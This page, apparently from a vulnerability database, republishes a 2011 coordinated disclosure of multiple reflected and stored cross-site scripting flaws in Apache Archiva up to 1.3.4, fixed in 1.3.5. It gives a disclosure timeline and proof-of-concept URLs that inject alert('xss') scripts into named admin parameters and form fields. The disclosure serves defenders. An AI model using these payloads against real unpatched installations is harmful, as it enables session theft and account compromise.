Lucene search
K

Apache Archiva 1.3.4 Cross Site Scripting

🗓️ 30 May 2011 00:00:00Reported by Riyaz WalikarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 47 Views

Apache Archiva 1.3.4 Cross Site Scripting vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Apache Archiva < 1.3.5 Multiple Vulnerabilities
5 Jun 201100:00
nessus
CVE
CVE-2011-1026
2 Jun 201120:00
cve
CVE
CVE-2011-1077
2 Jun 201120:00
cve
Cvelist
CVE-2011-1026
2 Jun 201120:00
cvelist
Cvelist
CVE-2011-1077
2 Jun 201120:00
cvelist
EUVD
EUVD-2011-1043
7 Oct 202500:30
euvd
EUVD
EUVD-2011-1092
7 Oct 202500:30
euvd
NVD
CVE-2011-1026
2 Jun 201120:55
nvd
NVD
CVE-2011-1077
2 Jun 201120:55
nvd
OpenVAS
Apache Archiva <= 1.3.4 Multiple Vulnerabilities - Active Check
2 Jun 201100:00
openvas
Rows per page
`Hi,  
  
This is regarding multiple XSS (Cross Site Scripting) Vulnerabilities in  
Apache Archiva 1.3.4 (and previous versions). The following is the  
disclosure document  
  
Project: Apache Archiva  
Severity: High  
Versions: 1.3.0 - 1.3.4. The unsupported versions Archiva 1.0 - 1.2.2  
are also affected.  
Exploit type: Multiple XSS  
Mitigation: Archiva 1.3.4 and earlier users should upgrade to 1.3.5  
Vendor URL: http://archiva.apache.org/security.html  
CVE: CVE-ID-2011-1077  
--------------------------------------------------------------------  
  
Timeline:  
28 February 2011: Vendor Contacted  
1 March 2011: Vendor Response received. CVE-2011-1026 for CSRF Issues  
Assigned.  
7 March 2011: CVE-2011-1077 Assigned for XSS Issues.  
14 March 2011: Fixes released to selected channels / Found to be  
insufficient  
27 May 2011: Vendor releases v1.3.5  
27 May 2011: Vendor releases security disclosure to Bugtraq and FD.  
30 May 2011: Exploit details released.  
--------------------------------------------------------------------  
  
Product Description:  
Apache Archiva is an extensible repository management software that  
helps taking care of your own personal or enterprise-wide build artifact  
repository. It is the perfect companion for build tools such as Maven,  
Continuum, and ANT.  
  
Archiva offers several capabilities, amongst which remote repository  
proxying, security access management, build artifact storage, delivery,  
browsing, indexing and usage reporting, extensible scanning  
functionality... and many more!   
(Source: http://archiva.apache.org/)  
--------------------------------------------------------------------  
  
Vulnerability Details:  
User can insert HTML or execute arbitrary JavaScript code within the  
vulnerable application. The vulnerabilities arise due to insufficient  
input validation in multiple input fields throughout the application.  
Successful exploitation of these vulnerabilities could result in, but  
not limited to, compromise of the application, theft of   
cookie-based authentication credentials, arbitrary url redirection,  
disclosure or modification of sensitive data and phishing attacks.  
  
----------------------------------------------------------------------  
  
Proof of Concept:  
Reflected XSS:  
http://127.0.0.1:8080/archiva/security/useredit.action?username=test%3Cs  
cript%3Ealert%28%27xss%27%29%3C/script%3E  
http://127.0.0.1:8080/archiva/security/roleedit.action?name=%22%3E%3Cscr  
ipt%3Ealert%28%27xss%27%29%3C%2Fscript%3E  
http://127.0.0.1:8080/archiva/security/userlist!show.action?roleName=tes  
t%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E  
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1<s  
cript>alert('xss')</script>&artifactId=1<script>alert('xss')</script>&ve  
rsion=1&repositoryId=internal  
http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath!commit.action?  
legacyArtifactPath.path=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript  
%3E&groupId=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&artifact  
Id=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&version=test%3Csc  
ript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&classifier=test%3Cscript%3Eal  
ert%28%27xss%27%29%3C%2Fscript%3E&type=test%3Cscript%3Ealert%28%27xss%27  
%29%3C%2Fscript%3E  
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!confirm.action?pr  
oxyid=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E  
  
  
Persistant (Stored) XSS:  
Exploit code: test<script>alert('xss')</script>  
http://127.0.0.1:8080/archiva/admin/addRepository.action  
(Identifier:repository.id, Name:repository.name,  
Directory:repository.location, Index Directory:repository.indexDir)  
http://127.0.0.1:8080/archiva/admin/confirmDeleteRepository.action?repoi  
d=  
  
http://127.0.0.1:8080/archiva/admin/editAppearance.action  
(Name:organisationName, URL:organisation:URL, LogoURL:organisation:URL)  
http://127.0.0.1:8080/archiva/admin/configureAppearance.action  
  
http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath.action(Path:na  
me=legacyArtifactPath.path, GroupId:groupId, ArtifactId:artifactId,  
Version:version, Classifier:classifier, Type:type)  
http://127.0.0.1:8080/archiva/admin/legacyArtifactPath.action  
  
http://127.0.0.1:8080/archiva/admin/addNetworkProxy.action  
(Identifier:proxy.id, Protocol:proxy.protocol, Hostname:proxy.host,  
Port:proxy.port, Username:proxy.username)  
http://127.0.0.1:8080/archiva/admin/networkProxies.action  
---------------------------------------------------------------------  
  
Warm Regards,  
Riyaz Ahemed Walikar || Senior Engineer - Professional Services  
Vulnerability Assessment & Penetration Testing  
Mobile: +91-98860-42242 || Extn: 5601  
  
  
  
The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material.   
Any review, re-transmission, dissemination or other use of or taking of any action in reliance upon,this information by persons or entities other than the intended recipient is prohibited.   
If you received this in error, please contact the sender and delete the material from your computer.   
Microland takes all reasonable steps to ensure that its electronic communications are free from viruses.   
However, given Internet accessibility, the Company cannot accept liability for any virus introduced by this e-mail or any attachment and you are advised to use up-to-date virus checking software.   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation